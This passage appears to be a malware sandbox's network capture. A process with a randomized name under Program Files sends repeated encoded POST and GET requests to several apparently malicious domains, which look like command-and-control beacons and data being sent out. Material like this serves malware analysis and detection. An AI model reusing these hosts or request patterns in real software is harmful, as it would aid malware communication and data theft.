                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    20          192.168.2.5  49732        162.0.238.246   80                4508  C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                                                                    Sep 30, 2024 19:58:21.659895897 CEST  471                OUT        GET /dbbh/?FbuX5DnP=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:22.256741047 CEST  610                IN         HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:22 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    21          192.168.2.5  49733        31.31.196.17    80                4508  C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                                                                    Sep 30, 2024 19:58:27.396368027 CEST  734                OUT        POST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=1XFCr+0Ft2zXo21hiaohV7W/o++SRKc1O11P6YdaUhp7D/CeEjHTR/RacQ7YknSrJjSmgpxUZyYXFy0jTKYolPVt6xPvFU1iQYmXuPLBvEDRjdE3s5oH9VgRPNASIh+47ysP6rEv62jbSoRDXmTXh3xvPfU04AKK6f30jkCskATx+0i1139Ygnj9/q8s5NIjvr5gq0Y=
                                                                                                                    Sep 30, 2024 19:58:28.107503891 CEST  375                IN         HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:28 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    22          192.168.2.5  49734        31.31.196.17    80                4508  C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp                             Bytes transferred  Direction  Data
                                                                                                                    Sep 30, 2024 19:58:29.939858913 CEST  754                OUT        POST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBE57DfyeFiHTW/RaJg7Z6XSgJjeAgodUZz8XF3QjQ9N+kfVvmxPtL01iQYmXuPPrvAXRjtU3sYoEjFgQINASMh+87ysp6qIR61bbSphDX3TUv3xpF/VnrS3PwJjBok7W7z/u2iPfvV1wzHPFv50bo9pK1IpQ0jN5KcaKWVkcyg5ZFrXa0ai0
                                                                                                                    Sep 30, 2024 19:58:30.695768118 CEST  375                IN         HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:30 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    23 | 192.168.2.5 | 49735 | 31.31.196.17 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:32.486839056 CEST | 1771 | OUT | POST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:33.170191050 CEST | 375 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:33 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    24 | 192.168.2.5 | 49736 | 31.31.196.17 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:35.033844948 CEST | 474 | OUT | GET /fbcx/?FbuX5DnP=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.dverkom.store
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:35.786484003 CEST | 733 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:35 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    25 | 192.168.2.5 | 49737 | 52.223.13.41 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:41.173870087 CEST | 755 | OUT | POST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=KXXFgx8CNRTJEJZiEzKNhxGMx8U8rReXPmzNpVtY9Yht1WIhxkoGqkiyi8B0Z6BjsgKYlFLy5JO4/MWNIleAb8YTfzoQEjmNuD9jtrPz7oT1YQUQgUxoY6yQBUsuUuiFmzM9Bijmv/rQOR4SccqPm8X+whekkwNHyZlOyyygXIYeDNL/+3dKp9jZK97ksAt5xI9ZnZo=


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    26 | 192.168.2.5 | 49738 | 52.223.13.41 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:43.725866079 CEST | 775 | OUT | POST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=KXXFgx8CNRTJGpJiHQiNkRGN9cU8hxfQPm/NpUZy9KVt00QhwloGtkiy3MBxd6AOsgHnlAzy5Pi4/JyNJUeDbsYRSToSKDmNuD9jtvvJ7ob1YjcQm1xnGKyRGUsuQuiBmzNNBmjAv9TQOQkSYeCO/MX4+Bf3p1Q3zaNb/CzDM5QTLbmVkVVi6dPhauzT9wMQrrtp5O9NxiHcoqi3PeKA5cSgzLrY


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    27 | 192.168.2.5 | 49739 | 52.223.13.41 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:46.270384073 CEST | 1792 | OUT | POST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    28 | 192.168.2.5 | 49740 | 52.223.13.41 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:48.815566063 CEST | 481 | OUT | GET /iq05/?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:49.261528015 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:49 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 270
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4wh"}</script></head></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    29 | 192.168.2.5 | 49741 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:54.335006952 CEST | 749 | OUT | POST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=j61RLW+4xQmTIU9VYLOcEWTgzcccf3NKYa2YX09aXqXJbZ1nkSFP6DJJTiOx2nLEIHRV6usXsZ2k1oBStEiCxLlLl2/LNtE/ZWT6D41PWG0CQLKxPDZQzhnaMZTflwHpEElOsacwflcPEDLwXKOMzdhEj/iqt4TD0R0aECliAeLVlmV1cVsC6V1qdqKF8MzYAiNv37o=
                                                                                                                    Sep 30, 2024 19:58:54.788800955 CEST | 836 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:54 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:54 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afCkjHWCtwPqc0fbD%2Bkg%2B%2B6KCL36NNynOUzNII%2FzIqGeRH8JXp%2ByjohYOpUGlua%2FuL%2Ff90txO5J42abs6NS0BAn%2FIPihknDI3VR7Ttaicg9KXm3Q2kGzT%2FFUYOuAX6bU5miYE3oejqUV"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61a901b7f42b3-EWR
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    30 | 192.168.2.5 | 49742 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:56.874047041 CEST | 769 | OUT | POST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=j61RLW+4xQmTK1NVaoWcV2ThtMccInNWYaqYXxFKX5jJb4Fnqw9P3jJJbCO0ynLaIHdr6uAXsZyk1oRStzOFy7lJqW/JDNE/ZWT6D4h2WHQCQ76xOiZX6BnZbpTfhwHtEElssY4WfgYPEC7wXbOLoth4+vjDl6zK9XlQBjkCRYCxtw4fG3kqp1ZSN5Cyt8SxaBdfps/4wfpYmzLTGKDwkiSdp3xU
                                                                                                                    Sep 30, 2024 19:58:57.348726988 CEST | 826 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:57 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPym5pxAjbct7v3qol%2Bo3PoYh3fXeCYID8PxGHKhiSS08Z%2BQPSNIsweCfCNfzENhL0XeIfTVOLwHFSdDGaLSS1xMdnpxw5%2F47aPmQCcs1gLdy%2FxqRmEwKLMugpraBebbqId5Me1FhTi3"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61aa009b88cc8-EWR
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    31 | 192.168.2.5 | 49743 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:58:59.425898075 CEST | 1786 | OUT | POST /g48c/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    Origin: http://www.bayarcepat19.click
                                                                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP= [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:58:59.901937008 CEST | 826 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:59 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:58:59 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boLq8b6F%2FEdoPyhmDNxDIvepCZ%2Fx2fdPJlrUZ5TCkcBEXz5xZAib9dZKHsEzqSmYPqMoinITIYYlmFPk%2BNazkiwa70vQodMhxcIhG8NdbyE0Pt9%2BuXtwGvtm0vQfDmt4CWjyrpw2NAXM"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61ab00bc81a24-EWR
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    32 | 192.168.2.5 | 49744 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:01.966705084 CEST | 479 | OUT | GET /g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.bayarcepat19.click
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:02.419495106 CEST | 998 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 167
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=3600
                                                                                                                    Expires: Mon, 30 Sep 2024 18:59:02 GMT
                                                                                                                    Location: https://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFg77M2TAZvyuEEEJMVlZFdnySo%2BNczrv6cvfuzTJzHbDPTzdVXRjUVcvUN8y%2BYDdSQdPQw1pG1AfZiycvghzCCWJRwjeZQh9UTNg9P2dl69V3HC2MBIf0uFS4OLJBkg33lulSwY13TF"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8cb61abfce727d1a-EWR
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    33 | 192.168.2.5 | 49745 | 206.119.82.147 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:07.475636959 CEST | 725 | OUT | POST /jo6v/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.wdeb18.top
                                                                                                                    Origin: http://www.wdeb18.top
                                                                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=7OFv+ElOXEe7wgQMqkj/cXaoKo3dmtnr7GRPDiIpCGMk51oodAOzBOe+q9dBnD5I8RrcyJcnC1tJU8mUVKLpTpNAhmPvK9wQKlB6FaU5Iwo4ZHOK6FY5u6Vr1/m/BDOQvxWwVNEIXBHnQkP7eLKa86ltq6MTMnUlVU99k2gN6x+OMU7vp7q1RmP35NG3NyjTSxeUuNI=
                                                                                                                    Sep 30, 2024 19:59:08.371539116 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:08 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 138
                                                                                                                    Connection: close
                                                                                                                    ETag: "66aa3fcf-8a"
